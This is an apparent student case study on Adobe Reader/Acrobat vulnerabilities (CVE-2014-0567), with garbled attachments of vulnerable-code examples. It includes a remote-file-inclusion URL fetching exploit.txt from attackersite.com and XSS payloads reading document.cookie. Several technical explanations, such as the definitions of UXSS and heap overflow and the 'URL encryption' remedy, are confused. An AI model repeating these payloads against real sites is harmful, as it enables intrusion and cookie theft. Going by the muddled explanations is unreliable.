Vulnerability in the Communication System - Case Study Example

Staff Study on a Vulnerability al Affiliation) Staff Study on a Vulnerability Preparation of a Staff Study on a vulnerability in the Communication System PROBLEM The CVE- 2014- 0567 refers to Adobe Acrobat and the Adobe Reader, two commonly used plugins or applications for files in the PDF format (ASB, n.p.). These two applications have a significant number of vulnerabilities that make information obtainable to unauthorized persons from a remote access point. An attacker can acquire contact to PDF files that may contain the organization’s confidential information. When attackers gain access to these PDF files, they may distort the content of the information. With such contact, they may make vital information inaccurate, thus making such information wrong for use by employees in their professional operations. In addition to that, when attackers hack into the organization’s systems and access PDF files, they may steal vital data from the body. Theft of information exposes the establishment’s operations to individuals who may be neither employees nor consulting on contract. FACTORS THAT BEAR ON THE PROBLEM Lack of regular updates This study revealed that the organization does not undertake regular updates of its software, including the Adobe Acrobat and the Adobe Reader plugins. By not upgrading the plugins regularly, the company continued running Adobe on previous versions that have few security features (Straub, 2008). While using these versions, the company’s PDF files were exposed to attacks and access by unauthorized individuals. Lack of information on the vulnerability specifics Most employees did not have information concerning the details of the vulnerabilities that Adobe Acrobat and Adobe Reader have. As such, they were not able to detect any penetrations in the event that any occurred while they used the company files. In addition to that, the Information Technology had not taken steps to secure the applications used by the company to handle PDF files. Lack of software that works without encryption of the URL The Information Technology department staff acknowledge the fact that they cannot guarantee that all personnel who use the organization’s web application may make use of a patched browser. When the employees do not use patched browsers, they increase the possibility of the URL undergoing encryption. Definitions The CVE- 2014- 0567 is a vulnerability in the Adobe Reader Application and the Adobe Acrobat. Adobe Acrobat and Adobe Reader are applications used in the viewing and handling of files in PDF format (ASB, n.p.). A vulnerability is a weakness that allows an attacker to obtain confidential files with few restrictions. The UXSS is a type of scripting that may deny the user access to the PDF file at the point at which they may want to access the file. A heap overflow vulnerability occurs in the event that a portion of memory gets assigned to the heap. DISCUSSION This study provides a description of the exploits or vulnerabilities attached to the CVE- 2014- 0567. Both Adobe Acrobat and the Adobe Reader used within the organization have a number of vulnerabilities that may allow a hacker or an unauthorized user to execute the code remotely. From an external server, an unauthorized person can access the PDF files and change the content of information in the document, making it unfit for use (Perssichetti, 2012). The organization uses the Adobe Acrobat and the Adobe Reader on both its Windows and Mac computers. The vulnerabilities on the Adobe Applications under study may manifest themselves in different ways compared to their manifestation on Windows computers. This difference arises from the difference in versions of the applications used in the two operating systems (ASB, n.p). The Macintosh versions of the Adobe Acrobat and Adobe Reader (CVE- 2014- 0562) possess a universal scripting that cuts across sites, which is the UXSS. The UXSS gives an attacker the ability to launch an attack on web applications or websites that show weakness towards the XSS. These defects may result from inadequate development of codes on both the side of the server and the side of the client. The UXSS can take advantage of the vulnerabilities on the side of the client both in the extensions of the browser and on the browser itself, and hack through entering malicious code. The execution of these codes may grant an attacker access to unsecured browsing sessions on weak web pages. The attacker may also access any sessions on the web pages that a user may open at that particular time. It is imperative to note that the UXSS can trigger even in the absence of vulnerable web pages. It possesses the ability to penetrate sessions that belong to well written and secure web pages, in the process managing to create a vulnerability in new places. The UXSS can quickly exploit the gaps in the Adobe reader and Adobe Acrobat through the embedding of scripts into suspect URLs. After the embedding, the leveraging of the extension may allow an attacker to run malicious codes any time the user opens a file in PDF format. Adobe plugins can populate data from sources outside the internal network with document forms. This activity takes place through a number of parameters. A weakness may present itself when the parameters used were not implemented in a proper manner. This gap allows the UXSS to develop the condition (Perssichetti, 2012). The Adobe plugins also have some heap overflow vulnerabilities. As the computer’s memory is assigned to the heap, data stored on the organization’s computers or accessed online may be written to that portion of memory without due checking. As a result, some data structures considered critical may be overwritten, like the heap headers. When an attacker takes over the system of the organization, they may execute the code CVE- 2014- 0567, therefore gaining access to the internal vital information. The Windows operating system also has vulnerabilities in its versions of Adobe Reader ad Adobe Acrobat. The flaw in the Windows Adobe Reader and Adobe Acrobat is a sandbox bypass. An attacker may exploit this flaw and start running native codes. With the native codes running, the attacker will have heightened privileges on the Windows operating system. As such, an attacker may find access to the files stored in PDF format in the computer’s network. These vulnerabilities allow an attacker to execute native codes without the user knowing that the system on which the computer is running is under an external attack (Murray, 2005). The proposal that this study approves is investment in software that operates without encrypting the URL. Such software aid in the mitigation of the attacks initiated through the UXSS. They will guarantee the protection of the user by forcing the organization’s browsers to give an option of opening the document without downloading it (Straub, 2008). The user can also save the page directly as opposed to loading the document in PDF format in the Acrobat Plugin already embedded. When the company adopts such software, when the users of the computer network use an unpatched browser it will be harder for an attacker to hack into the systems and access vital PDF files. The system will be more secure because the browser will not encrypt the URL of the source of the PDF. An additional measure may involve the upgrading of Adobe Acrobat and Adobe Reader to updated versions such as 11.0.09 and 10.1.12 on both Windows and Macintosh operating systems (ASB, n.p). CONCLUSION The study revealed that the system run by the organization does not have necessary checks against information stored in PDF format because the company uses Adobe Reader and the Adobe Acrobat to access PDF files. With the vulnerabilities n the two applications exposing a significant amount of data in the possession of the company, it is important for the management to take necessary measures to protect its database and other private files. The security of the internal PDF files should be a matter of concern to the management and all employees (Straub, 2008). Therefore, the management needs to take the proposed measure to protect the PDF files from potential access by unauthorized persons through cyber-attacks. The use of software that works without encrypting the URL will help to prevent access to the organization’s data from remote access (Perssichetti, 2012). However, it is important to note that there is no way in which the organization may protect its Adobe plugins from external attacks completely. This measure offers the best possible option to prevent unauthorized access through hacking. ACTION RECOMMENDED This study recommends that the organization invests in security software that would help in boosting the safety of the internal database. Furthermore, using such software will be essential to the protection of online activities by employees of the company from access and exploitation by external individuals (Murray, 2005). In this way, the organization’s employees will be able to access PDF files online with significantly reduced threats of attacks. The organization can also undertake regular upgrades of the Adobe Acrobat and Adobe Reader. Newer versions released by Adobe recently such as the 11.0.09 and 10.1.12 have better security features that will serve to protect the organization’s PDF files further. References Adobe Security Bulletin. (n.d.). Retrieved December 6, 2014, from http://helpx.adobe.com/security/products/reader/apsb14-20.html Murray, W. (2005). Surveys of Information Security. Information Systems Security, 29-32. Perssichetti, E. (2012). Improving the efficiency of code-based cryptography. Straub, D. (2008). Information security policy, processes, and practices. Armonk, NewYork: M.E. Sharpe. Attachment 2: Examples of Vulnerable Code

Name:

The above code is an example of an instance where user-applied input is used in SQL query. The script should operate normally with absence of malicious characters in the username. if ($use_syslog && !$validated) { syslog("crit", ($nonexist ? "Non-existent" : $expired ? "Expired" : "Invalid"). " login as $authuser from $acpthost"); } This piece of code exists in miniserv.pl and caused vulnerability in Webmin. Its countermeasure involves editing the source code for proper verification of the input. The code below causes a vulnerability, allowing external attack on private networks and servers through inclusion of remote files containing malicious code into the URL. http://vulnerable_server/includes/include_once.php? include_file=https://attackersite.com/exploit.txt (note: all on one line) An attacker can run an arbitrary code on the weakened server through the exploit.txt file below: Attachment 3: Welcome!!

Enter your name:

This code is exposed to attacks by the XSS. The value given to ‘name_1’ has not been sanitized before it was echoed back to the user, making it easy to execute arbitrary script. This is an example exploit code: http://victim_site/clean.php?name_1=code or http://victim_site/clean.php?name_1=alert(document.cookie); To avoid attacks by the XSS, this code can undergo modification to: Read More